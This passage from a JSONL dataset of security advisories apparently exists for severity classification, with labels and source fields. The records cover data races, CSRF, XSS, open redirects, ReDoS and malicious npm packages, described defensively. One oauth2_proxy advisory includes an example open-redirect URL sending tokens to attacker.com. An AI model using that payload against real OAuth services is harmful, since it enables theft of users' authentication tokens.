Debug, and the default implementations of those traits access &T by invoking T::clone() & T::fmt(). It is possible to create data races & undefined behavior by concurrently invoking SyncRef::clone() or SyncRef::fmt() from multiple threads with T: !Sync.", "text_raw": "Data race in v9\n\n[Severity: HIGH]\n\nAffected versions of this crate unconditionally implement Sync for SyncRef. This definition allows data races if &T is accessible through &SyncRef.\n\nSyncRef derives Clone and Debug, and the default implementations of those traits access &T by invoking T::clone() & T::fmt(). It is possible to create data races & undefined behavior by concurrently invoking SyncRef::clone() or SyncRef::fmt() from multiple threads with T: !Sync.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "3e22e8570054a02cf2ab", "text": "Spybot Search & Destroy 1.6.2 Security Center Service Privilege Escalation", "text_raw": "Spybot Search & Destroy 1.6.2 Security Center Service Privilege Escalation\n\nSeverity: low", "severity": "low", "severity_label": 0, "source": "zeroscience", "timestamp": "2015-03-16", "split": "train"} -{"id": "7aec56fec88f4846e2d6", "text": "Kotti CSRF in the local roles implementation\n\nKotti before 1.3.2 and 2.x before 2.0.0b2 has CSRF in the local roles implementation, as demonstrated by triggering a permission change via a `/admin-document/@@share` request.", "text_raw": "Kotti CSRF in the local roles implementation\n\n[Severity: HIGH]\n\nKotti before 1.3.2 and 2.x before 2.0.0b2 has CSRF in the local roles implementation, as demonstrated by triggering a permission change via a `/admin-document/@@share` request.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-12", "split": "train"} -{"id": "975e7b99265c9a78dc9a", "text": "The pattern '/\\domain.com' is not disallowed when redirecting, allowing for open redirect\n\n### Impact\nAn open redirect vulnerability has been found in `oauth2_proxy`. Anyone who uses `oauth2_proxy` may potentially be impacted.\n\nFor a context [detectify] have an in depth blog post about the potential impact of an open redirect. Particularly see the OAuth section.\n\n**tl;dr**: People's authentication tokens could be silently harvested by an attacker. e.g:\n`facebook.com/oauth.php?clientid=123&state=abc&redirect_url=https://yourdomain.com/red.php?url%3dhttps://attacker.com/`\n\n### Patches\n\n@sauyon found the issue, and has submitted a patch.\n\n```\ndiff --git a/oauthproxy.go b/oauthproxy.go\nindex 72ab580..f420df6 100644\n--- a/oauthproxy.go\n+++ b/oauthproxy.go\n@@ -517,7 +517,7 @@ func (p *OAuthProxy) GetRedirect(req *http.Request) (redirect string, err error)\n // IsValidRedirect checks whether the redirect URL is whitelisted\n func (p *OAuthProxy) IsValidRedirect(redirect string) bool {\n \tswitch {\n-\tcase strings.HasPrefix(redirect, \"/\") && !strings.HasPrefix(redirect, \"//\"):\n+\tcase strings.HasPrefix(redirect, \"/\") && !strings.HasPrefix(redirect, \"//\") && !strings.HasPrefix(redirect, \"/\\\\\"):\n \t\treturn true\n \tcase strings.HasPrefix(redirect, \"http://\") || strings.HasPrefix(redirect, \"https://\"):\n \t\tredirectURL, err := url.Parse(redirect)\n```\n\nThis patch will be applied to the next release, which is scheduled for when this is publicly disclosed.\n\n### Workarounds\n\nAt this stage there is no work around.", "text_raw": "The pattern '/\\domain.com' is not disallowed when redirecting, allowing for open redirect\n\n[Severity: MEDIUM]\n\n### Impact\nAn open redirect vulnerability has been found in `oauth2_proxy`. Anyone who uses `oauth2_proxy` may potentially be impacted. \n\nFor a context [detectify] have an in depth blog post about the potential impact of an open redirect. Particularly see the OAuth section.\n\n**tl;dr**: People's authentication tokens could be silently harvested by an attacker. e.g:\n`facebook.com/oauth.php?clientid=123&state=abc&redirect_url=https://yourdomain.com/red.php?url%3dhttps://attacker.com/`\n\n### Patches\n\n@sauyon found the issue, and has submitted a patch. \n\n```\ndiff --git a/oauthproxy.go b/oauthproxy.go\nindex 72ab580..f420df6 100644\n--- a/oauthproxy.go\n+++ b/oauthproxy.go\n@@ -517,7 +517,7 @@ func (p *OAuthProxy) GetRedirect(req *http.Request) (redirect string, err error)\n // IsValidRedirect checks whether the redirect URL is whitelisted\n func (p *OAuthProxy) IsValidRedirect(redirect string) bool {\n \tswitch {\n-\tcase strings.HasPrefix(redirect, \"/\") && !strings.HasPrefix(redirect, \"//\"):\n+\tcase strings.HasPrefix(redirect, \"/\") && !strings.HasPrefix(redirect, \"//\") && !strings.HasPrefix(redirect, \"/\\\\\"):\n \t\treturn true\n \tcase strings.HasPrefix(redirect, \"http://\") || strings.HasPrefix(redirect, \"https://\"):\n \t\tredirectURL, err := url.Parse(redirect)\n```\n\nThis patch will be applied to the next release, which is scheduled for when this is publicly disclosed.\n\n### Workarounds\n\nAt this stage there is no work around.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-12-20", "split": "train"} -{"id": "00e018261bd66647e997", "text": "NULL Pointer Dereference in Google TensorFlow\n\nNULL pointer dereference in Google TensorFlow before 1.12.1 could cause a denial of service via an invalid GIF file.", "text_raw": "NULL Pointer Dereference in Google TensorFlow\n\n[Severity: HIGH]\n\nNULL pointer dereference in Google TensorFlow before 1.12.1 could cause a denial of service via an invalid GIF file.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-04-30", "split": "train"} -{"id": "21e77277f3f47e93d040", "text": "Malicious Package in asnyc\n\nAll versions of `asnyc` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.\n\n## Recommendation\n\nRemove the package from your dependencies and always ensure package names are typed correctly upon installation.", "text_raw": "Malicious Package in asnyc\n\n[Severity: CRITICAL]\n\nAll versions of `asnyc` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.\n\n\n## Recommendation\n\nRemove the package from your dependencies and always ensure package names are typed correctly upon installation.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-02", "split": "train"} -{"id": "f997869bfcdaf465dbed", "text": "Malicious Package in js-sha7\n\nVersion 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "text_raw": "Malicious Package in js-sha7\n\n[Severity: CRITICAL]\n\nVersion 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "31866973471fe06b33f1", "text": "actionpack allows bypass of database-query restrictions\n\n`actionpack/lib/action_dispatch/http/request.rb` in Ruby on Rails before 3.2.16 and 4.x before 4.0.2 does not properly consider differences in parameter handling between the Active Record component and the JSON implementation, which allows remote attackers to bypass intended database-query restrictions and perform NULL checks or trigger missing WHERE clauses via a crafted request that leverages (1) third-party Rack middleware or (2) custom Rack middleware. NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-0155.", "text_raw": "actionpack allows bypass of database-query restrictions\n\n[Severity: MEDIUM]\n\n`actionpack/lib/action_dispatch/http/request.rb` in Ruby on Rails before 3.2.16 and 4.x before 4.0.2 does not properly consider differences in parameter handling between the Active Record component and the JSON implementation, which allows remote attackers to bypass intended database-query restrictions and perform NULL checks or trigger missing WHERE clauses via a crafted request that leverages (1) third-party Rack middleware or (2) custom Rack middleware. NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-0155.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "7945258d91cd1fc0f65b", "text": "Android SVG vulnerable to XML External Entity (XXE)\n\nAndroidSVG version 1.2.2 is vulnerable to XXE attacks in the SVG parsing component resulting in denial of service and possibly remote code execution", "text_raw": "Android SVG vulnerable to XML External Entity (XXE)\n\n[Severity: HIGH]\n\nAndroidSVG version 1.2.2 is vulnerable to XXE attacks in the SVG parsing component resulting in denial of service and possibly remote code execution", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-10-19", "split": "train"} -{"id": "0fc61412954f9d8db1e6", "text": "rails Cross-site Scripting vulnerability\n\nThe cross-site scripting (XSS) prevention feature in Ruby on Rails 2.x before 2.3.12, 3.0.x before 3.0.8, and 3.1.x before 3.1.0.rc2 does not properly handle mutation of safe buffers, which makes it easier for remote attackers to conduct XSS attacks via crafted strings to an application that uses a problematic string method, as demonstrated by the sub method.", "text_raw": "rails Cross-site Scripting vulnerability\n\n[Severity: MEDIUM]\n\nThe cross-site scripting (XSS) prevention feature in Ruby on Rails 2.x before 2.3.12, 3.0.x before 3.0.8, and 3.1.x before 3.1.0.rc2 does not properly handle mutation of safe buffers, which makes it easier for remote attackers to conduct XSS attacks via crafted strings to an application that uses a problematic string method, as demonstrated by the sub method.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "cc714fdaf47d2a50447b", "text": "Citrix ADC, Gateway, and SD-WAN WANOP Appliance Code Execution Vulnerability\n\nAffected: Citrix Application Delivery Controller (ADC), Gateway, and SD-WAN WANOP Appliance\n\nCitrix ADC, Citrix Gateway, and multiple Citrix SD-WAN WANOP appliance models contain an unspecified vulnerability that could allow an unauthenticated attacker to perform code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Citrix ADC, Gateway, and SD-WAN WANOP Appliance Code Execution Vulnerability\n\nAffected: Citrix Application Delivery Controller (ADC), Gateway, and SD-WAN WANOP Appliance\n\nCitrix ADC, Citrix Gateway, and multiple Citrix SD-WAN WANOP appliance models contain an unspecified vulnerability that could allow an unauthenticated attacker to perform code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "3df416961d1c6d518131", "text": "Regular Expression Denial of Service\n\nA flaw was found in nodejs-marked versions from 0.5.0 to before 0.6.1. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). Input to the host variable is vulnerable when input contains parenthesis in link URIs, coupled with a high number of link tokens in a single line.", "text_raw": "Regular Expression Denial of Service\n\n[Severity: MEDIUM]\n\nA flaw was found in nodejs-marked versions from 0.5.0 to before 0.6.1. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). Input to the host variable is vulnerable when input contains parenthesis in link URIs, coupled with a high number of link tokens in a single line.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-02-25", "split": "train"} -{"id": "a572c5460b519c1399ab", "text": "Out-of-bounds write in ChakraCore\n\nA remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833, CVE-2020-0848.", "text_raw": "Out-of-bounds write in ChakraCore\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833, CVE-2020-0848.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-07-28", "split": "train"} -{"id": "512efc4c1a4282be57e1", "text": "Malicious Package in ruffer-xor\n\nVersion 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "text_raw": "Malicious Package in ruffer-xor\n\n[Severity: CRITICAL]\n\nVersion 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "76d405cce23d2b33f11a", "text": "Denial of service in Valine\n\nValine is a fast, simple & powerful comment system. Valine 1.4.14 allows remote attackers to cause a denial of service (application outage) by supplying a ua (aka User-Agent) value that only specifies the product and version.", "text_raw": "Denial of service in Valine\n\n[Severity: MEDIUM]\n\nValine is a fast, simple & powerful comment system. Valine 1.4.14 allows remote attackers to cause a denial of service (application outage) by supplying a ua (aka User-Agent) value that only specifies the product and version.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-06-21", "split": "train"} -{"id": "ab0b419d08dd22d413c4", "text": "Command Injection in dns-sync\n\nWithdrawn: Duplicate of GHSA-jcw8-r9xm-32c6", "text_raw": "Command Injection in dns-sync\n\n[Severity: MEDIUM]\n\nWithdrawn: Duplicate of GHSA-jcw8-r9xm-32c6", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-08-27", "split": "train"} -{"id": "e38f10e0603a5d4a06ed", "text": "Cross-site Scripting in Strapi\n\nStrapi before 3.2.5 has stored XSS in the wysiwyg editor's preview feature.", "text_raw": "Cross-site Scripting in Strapi\n\n[Severity: MEDIUM]\n\nStrapi before 3.2.5 has stored XSS in the wysiwyg editor's preview feature.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-10-29", "split": "train"} -{"id": "161be7a9bf4465e2d026", "text": "Cross-site Scripting Vulnerability in GraphQL Playground (distributed by Apollo Server)\n\n### Impact\nIn certain configurations, Apollo Server serves the client-side web app \"GraphQL Playground\" from the same web server that executes GraphQL operations. This web app has access to cookies and other credentials associated with the web server's operations. There is a cross-site scripting vulnerability in GraphQL Playground that allows for arbitrary JavaScript code execution in your web server's origin. If a user clicks a specially crafted link to your GraphQL Playground page served by Apollo Server, an attacker can steal cookies and other private browser data.\n\nDetails of the underlying GraphQL Playground vulnerability are available in [this `graphql-playground` advisory](https://github.com/graphql/graphql-playground/security/advisories/GHSA-59r9-6jp6-jcm7). (A [similar vulnerability](https://github.com/graphql/graphiql/security/advisories/GHSA-x4r7-m2q9-69c8) exists in the related `graphiql` project.) This advisory focuses on identifying whether *Apollo Server* installations are vulnerable and mitigating the vulnerability in Apollo Server; see the other advisories for details on the XSS vulnerability itself.\n\nThe impact of this vulnerability is more severe if (as is common) your GraphQL server's origin URL is an origin that is used to store sensitive data such as cookies.\n\nIn order for this vulnerability to affect your Apollo Server installation, it must actually serve GraphQL Playground. The integration between Apollo Server and GraphQL Playground is different in Apollo Server 2 and Apollo Server 3. You can tell which version of Apollo Server you are running by looking at the version of the [package from which you import the `ApolloServer` class](https://www.apollographql.com/docs/apollo-server/integrations/middleware/): this may be `apollo-server`, `apollo-server-express`, `apollo-server-lambda`, etc.\n\n#### Apollo Server 3\n\nApollo Server 3 does not serve GraphQL Playground by default. It has a [landing page plugin system](https://www.apollographql.com/docs/apollo-server/api/plugin/landing-pages/) and the default plugin is a simple splash page that is not vulnerable to this exploit, linking to Apollo Sandbox Explorer. (We chose to change the default because GraphQL Playground is not actively maintained.)\n\nIf you are running Apollo Server 3, then you are *only* vulnerable if you *explicitly* import the [`ApolloServerPluginLandingPageGraphQLPlayground`](https://www.apollographql.com/docs/apollo-server/api/plugin/landing-pages/#graphql-playground-landing-page) plugin and pass it to your `ApolloServer`'s constructor in the `plugins` array. Otherwise, this advisory does not apply to your server.\n\n#### Apollo Server 2\n\nApollo Server 2 serves GraphQL Playground by default, unless the `NODE_ENV` environment variable is set to `production`, or if you explicitly configure it via the `playground` option to the `ApolloServer` constructor.\n\nYour Apollo Server 2 installation is vulnerable if *any* of the following is true:\n- You pass `playground: true` to the `ApolloServer` constructor\n- You pass some other object like `playground: {title: \"Title\"}` to the `ApolloServer` constructor\n- You do *not* pass any `playground` option to the `ApolloServer` constructor, *and* the `NODE_ENV` environment variable is *not* set to `production`\n\n#### Apollo Server 1\n\nApollo Server 1 included `graphiql` instead of `graphql-playground`. `graphiql` isn't automatically enabled in Apollo Server 1: you have to explicitly call a function such as `graphiqlExpress` to enable it. Because Apollo Server 1 is not commonly used, we have not done a detailed examination of whether the integration between Apollo Server 1 and `graphiql` is vulnerable to a similar exploit. If you are still using Apollo Server 1, we recommend you disable `graphiql` by removing the `graphiqlExpress` call, and then upgrade to a newer version of Apollo Server.\n\n### Patches and workarounds\n\nThere are several approaches you can take to ensure that your server is not vulnerable to this issue.\n\n", "text_raw": "Cross-site Scripting Vulnerability in GraphQL Playground (distributed by Apollo Server)\n\n[Severity: HIGH]\n\n### Impact\nIn certain configurations, Apollo Server serves the client-side web app \"GraphQL Playground\" from the same web server that executes GraphQL operations. This web app has access to cookies and other credentials associated with the web server's operations. There is a cross-site scripting vulnerability in GraphQL Playground that allows for arbitrary JavaScript code execution in your web server's origin. If a user clicks a specially crafted link to your GraphQL Playground page served by Apollo Server, an attacker can steal cookies and other private browser data.\n\nDetails of the underlying GraphQL Playground vulnerability are available in [this `graphql-playground` advisory](https://github.com/graphql/graphql-playground/security/advisories/GHSA-59r9-6jp6-jcm7). (A [similar vulnerability](https://github.com/graphql/graphiql/security/advisories/GHSA-x4r7-m2q9-69c8) exists in the related `graphiql` project.) This advisory focuses on identifying whether *Apollo Server* installations are vulnerable and mitigating the vulnerability in Apollo Server; see the other advisories for details on the XSS vulnerability itself.\n\nThe impact of this vulnerability is more severe if (as is common) your GraphQL server's origin URL is an origin that is used to store sensitive data such as cookies.\n\nIn order for this vulnerability to affect your Apollo Server installation, it must actually serve GraphQL Playground. The integration between Apollo Server and GraphQL Playground is different in Apollo Server 2 and Apollo Server 3. You can tell which version of Apollo Server you are running by looking at the version of the [package from which you import the `ApolloServer` class](https://www.apollographql.com/docs/apollo-server/integrations/middleware/): this may be `apollo-server`, `apollo-server-express`, `apollo-server-lambda`, etc.\n\n#### Apollo Server 3\n\nApollo Server 3 does not serve GraphQL Playground by default. It has a [landing page plugin system](https://www.apollographql.com/docs/apollo-server/api/plugin/landing-pages/) and the default plugin is a simple splash page that is not vulnerable to this exploit, linking to Apollo Sandbox Explorer. (We chose to change the default because GraphQL Playground is not actively maintained.)\n\nIf you are running Apollo Server 3, then you are *only* vulnerable if you *explicitly* import the [`ApolloServerPluginLandingPageGraphQLPlayground`](https://www.apollographql.com/docs/apollo-server/api/plugin/landing-pages/#graphql-playground-landing-page) plugin and pass it to your `ApolloServer`'s constructor in the `plugins` array. Otherwise, this advisory does not apply to your server.\n\n#### Apollo Server 2\n\nApollo Server 2 serves GraphQL Playground by default, unless the `NODE_ENV` environment variable is set to `production`, or if you explicitly configure it via the `playground` option to the `ApolloServer` constructor.\n\nYour Apollo Server 2 installation is vulnerable if *any* of the following is true:\n- You pass `playground: true` to the `ApolloServer` constructor\n- You pass some other object like `playground: {title: \"Title\"}` to the `ApolloServer` constructor\n- You do *not* pass any `playground` option to the `ApolloServer` constructor, *and* the `NODE_ENV` environment variable is *not* set to `production`\n\n#### Apollo Server 1\n\nApollo Server 1 included `graphiql` instead of `graphql-playground`. `graphiql` isn't automatically enabled in Apollo Server 1: you have to explicitly call a function such as `graphiqlExpress` to enable it. Because Apollo Server 1 is not commonly used, we have not done a detailed examination of whether the integration between Apollo Server 1 and `graphiql` is vulnerable to a similar exploit. If you are still using Apollo Server 1, we recommend you disable `graphiql` by removing the `graphiqlExpress` call, and then upgrade to a newer version of Apollo Server.\n\n### Patches and workarounds\n\nThere are several approaches you can take to ensure that your server is not vulnerabl", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-11-08", "split": "train"} -{"id": "ff5598063be8ae46a5ad", "text": "Pivotal Spring Framework Paths provided to the ResourceServlet were not properly sanitized\n\nAn issue was discovered in Pivotal Spring Framework before 3.2.18, 4.2.x before 4.2.9, and 4.3.x before 4.3.5. Paths provided to the ResourceServlet were not properly sanitized and as a result exposed to directory traversal attacks.", "text_raw": "Pivotal Spring Framework Paths provided to the ResourceServlet were not properly sanitized\n\n[Severity: HIGH]\n\nAn issue was discovered in Pivotal Spring Framework before 3.2.18, 4.2.x before 4.2.9, and 4.3.x before 4.3.5. Paths provided to the ResourceServlet were not properly sanitized and as a result exposed to directory traversal attacks.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-10-04", "split": "train"} -{"id": "310133877bf35eb947b4", "text": "Object injection in cookie driver in phpfastcache\n\n### Impact\nAn possible object injection has been discovered in cookie driver prior 5.0.13 versions (of 5.x releases).\n\n### Patches\nThe issue has been addressed by enforcing JSON conversion when deserializing\n\n### Workarounds\nIf you can't fix it, use another driver such as \"Files\" (Filesystem)\n\n### References\nFixing release: https://github.com/PHPSocialNetwork/phpfastcache/releases/tag/5.0.13\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [the issue tracker](https://github.com/PHPSocialNetwork/phpfastcache/issues)\n* Email us at [security@geolim4.com](mailto:security@geolim4.com)", "text_raw": "Object injection in cookie driver in phpfastcache\n\n[Severity: MEDIUM]\n\n### Impact\nAn possible object injection has been discovered in cookie driver prior 5.0.13 versions (of 5.x releases).\n\n### Patches\nThe issue has been addressed by enforcing JSON conversion when deserializing\n\n### Workarounds\nIf you can't fix it, use another driver such as \"Files\" (Filesystem)\n\n### References\nFixing release: https://github.com/PHPSocialNetwork/phpfastcache/releases/tag/5.0.13\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [the issue tracker](https://github.com/PHPSocialNetwork/phpfastcache/issues)\n* Email us at [security@geolim4.com](mailto:security@geolim4.com)\n", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-12-12", "split": "train"} -{"id": "8f5d9998236b259aac29", "text": "Information Exposure in jaeger\n\nSensitive information written to a log file vulnerability was found in jaegertracing/jaeger before version 1.18.1 when the Kafka data store is used. This flaw allows an attacker with access to the container's log file to discover the Kafka credentials.", "text_raw": "Information Exposure in jaeger\n\n[Severity: MEDIUM]\n\nSensitive information written to a log file vulnerability was found in jaegertracing/jaeger before version 1.18.1 when the Kafka data store is used. This flaw allows an attacker with access to the container's log file to discover the Kafka credentials.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-05-18", "split": "train"} -{"id": "93e351e745fea0076add", "text": "Cross-site scripting (XSS) from image block content in the site frontend\n\n### Impact\n\nKirby's [blocks field](https://getkirby.com/docs/reference/panel/fields/blocks) stores structured data for each block. This data is then used in [block snippets](https://getkirby.com/docs/reference/panel/fields/blocks#block-snippets) to convert the blocks to HTML for use in your templates. We recommend to [escape HTML special characters](https://getkirby.com/docs/guide/templates/escaping) against cross-site scripting (XSS) attacks.\n\nCross-site scripting (XSS) is a type of vulnerability that allows to execute any kind of JavaScript code inside the site frontend or Panel session of other users. If the user is logged in to the Panel, a harmful script can for example trigger requests to Kirby's API with the permissions of the victim.\n\nThe default snippet for the [image block](https://getkirby.com/docs/reference/panel/blocks/image) unfortunately did not use our escaping helper. This made it possible to include malicious HTML code in the source, alt and link fields of the image block, which would then be displayed on the site frontend and executed in the browsers of site visitors and logged in users who are browsing the site.\n\nThis vulnerability is critical if you might have potential attackers in your group of authenticated Panel users. They can escalate their privileges if they get access to the Panel session of an admin user. Depending on your site, other JavaScript-powered attacks are possible.\n\nYou are *not* affected if you don't use the blocks field or specifically the image block in any of your blueprints. You are also protected if you use a custom [block snippet](https://getkirby.com/docs/reference/panel/fields/blocks#block-snippets) that either escapes the printed values or doesn't use them. The attack can only be performed by logged-in users and only surfaces in the site frontend (i.e. in your templates). The Panel itself is unaffected and will not execute JavaScript that was injected into the image block content.\n\n### Patches\n\nWe have patched the vulnerability in [Kirby 3.5.8](https://github.com/getkirby/kirby/releases/tag/3.5.8) by escaping special HTML characters in the output from the default image block snippet. Please update to this or a [later version](https://github.com/getkirby/kirby/releases/) to fix the vulnerability.\n\n### Credits\n\nThanks to Azrul Ikhwan Zulkifli (@azrultech) from BAE Systems AI Vulnerability Research Team for responsibly reporting the identified issue.", "text_raw": "Cross-site scripting (XSS) from image block content in the site frontend\n\n[Severity: MEDIUM]\n\n### Impact\n\nKirby's [blocks field](https://getkirby.com/docs/reference/panel/fields/blocks) stores structured data for each block. This data is then used in [block snippets](https://getkirby.com/docs/reference/panel/fields/blocks#block-snippets) to convert the blocks to HTML for use in your templates. We recommend to [escape HTML special characters](https://getkirby.com/docs/guide/templates/escaping) against cross-site scripting (XSS) attacks.\n\nCross-site scripting (XSS) is a type of vulnerability that allows to execute any kind of JavaScript code inside the site frontend or Panel session of other users. If the user is logged in to the Panel, a harmful script can for example trigger requests to Kirby's API with the permissions of the victim.\n\nThe default snippet for the [image block](https://getkirby.com/docs/reference/panel/blocks/image) unfortunately did not use our escaping helper. This made it possible to include malicious HTML code in the source, alt and link fields of the image block, which would then be displayed on the site frontend and executed in the browsers of site visitors and logged in users who are browsing the site.\n\nThis vulnerability is critical if you might have potential attackers in your group of authenticated Panel users. They can escalate their privileges if they get access to the Panel session of an admin user. Depending on your site, other JavaScript-powered attacks are possible.\n\nYou are *not* affected if you don't use the blocks field or specifically the image block in any of your blueprints. You are also protected if you use a custom [block snippet](https://getkirby.com/docs/reference/panel/fields/blocks#block-snippets) that either escapes the printed values or doesn't use them. The attack can only be performed by logged-in users and only surfaces in the site frontend (i.e. in your templates). The Panel itself is unaffected and will not execute JavaScript that was injected into the image block content.\n\n### Patches\n\nWe have patched the vulnerability in [Kirby 3.5.8](https://github.com/getkirby/kirby/releases/tag/3.5.8) by escaping special HTML characters in the output from the default image block snippet. Please update to this or a [later version](https://github.com/getkirby/kirby/releases/) to fix the vulnerability.\n\n### Credits\n\nThanks to Azrul Ikhwan Zulkifli (@azrultech) from BAE Systems AI Vulnerability Research Team for responsibly reporting the identified issue.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-11-16", "split": "train"} -{"id": "1313bd8eb4c62286c3ca", "text": "Improper Neutralization of CRLF Sequences in HTTP Headers in Jooby ('HTTP Response Splitting)\n\n### Impact\n\n- Cross Site Scripting\n - Cache Poisoning\n - Page Hijacking\n\n### Patches\n\nThis was fixed in version `2.2.1`.\n\n### Workarounds\n\nIf you are unable to update, ensure that user supplied data isn't able to flow to HTTP headers. If it does, pre-sanitize for CRLF characters.\n\n### References\n\n##### [CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')](https://cwe.mitre.org/data/definitions/113.html)\n\nI've been poking at libraries to see if they are vulnerable to HTTP Response Splitting and Jooby is my third case of finding this vulnerability.\n\n### Root Cause\n\nThis roots cause back to this line in the Jooby codebase:\n\nhttps://github.com/jooby-project/jooby/blob/93cfc80aa20c188f71a442ea7a1827da380e1c27/modules/jooby-netty/src/main/java/io/jooby/internal/netty/NettyContext.java#L102\n\nThe `DefaultHttpHeaders` takes a parameter `validate` which, when `true` (as it is for the no-arg constructor) validates that the header isn't being abused to do HTTP Response Splitting.\n\n### Reported By\n\nThis vulnerability was reported by @JLLeitschuh ([Twitter](https://twitter.com/JLLeitschuh))\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [jooby-project/jooby](https://github.com/jooby-project/jooby/issues)", "text_raw": "Improper Neutralization of CRLF Sequences in HTTP Headers in Jooby ('HTTP Response Splitting)\n\n[Severity: CRITICAL]\n\n### Impact\n\n - Cross Site Scripting\n - Cache Poisoning\n - Page Hijacking\n\n### Patches\n\nThis was fixed in version `2.2.1`.\n\n### Workarounds\n\nIf you are unable to update, ensure that user supplied data isn't able to flow to HTTP headers. If it does, pre-sanitize for CRLF characters.\n\n### References\n\n##### [CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')](https://cwe.mitre.org/data/definitions/113.html)\n\nI've been poking at libraries to see if they are vulnerable to HTTP Response Splitting and Jooby is my third case of finding this vulnerability.\n\n### Root Cause\n\nThis roots cause back to this line in the Jooby codebase:\n\nhttps://github.com/jooby-project/jooby/blob/93cfc80aa20c188f71a442ea7a1827da380e1c27/modules/jooby-netty/src/main/java/io/jooby/internal/netty/NettyContext.java#L102\n\nThe `DefaultHttpHeaders` takes a parameter `validate` which, when `true` (as it is for the no-arg constructor) validates that the header isn't being abused to do HTTP Response Splitting.\n\n### Reported By\n\nThis vulnerability was reported by @JLLeitschuh ([Twitter](https://twitter.com/JLLeitschuh))\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [jooby-project/jooby](https://github.com/jooby-project/jooby/issues)", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-04-03", "split": "train"} -{"id": "d94dd84de716f9f9dd36", "text": "Steam Socialite Provider v1 does not correctly validate openid server\n\n### Impact\nThe outdated version 1 of the Steam Socialite Provider doesn't check properly if the login comes from `steamcommunity.com`, allowing a malicious actor to substitute their own openID server.\n\n### Patches\nThis vulnerability only affects the outdated v1.x versions of the package. These are no longer maintained, users should upgrade to v3 or v4, which use a hardcoded endpoint to verify the login.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [SocialiteProviders/Providers](https://github.com/SocialiteProviders/Providers)\n* Email us at [socialite@atymic.dev](mailto:socialite@atymic.dev)", "text_raw": "Steam Socialite Provider v1 does not correctly validate openid server\n\n[Severity: CRITICAL]\n\n### Impact\nThe outdated version 1 of the Steam Socialite Provider doesn't check properly if the login comes from `steamcommunity.com`, allowing a malicious actor to substitute their own openID server.\n\n### Patches\nThis vulnerability only affects the outdated v1.x versions of the package. These are no longer maintained, users should upgrade to v3 or v4, which use a hardcoded endpoint to verify the login.\n\n### For more 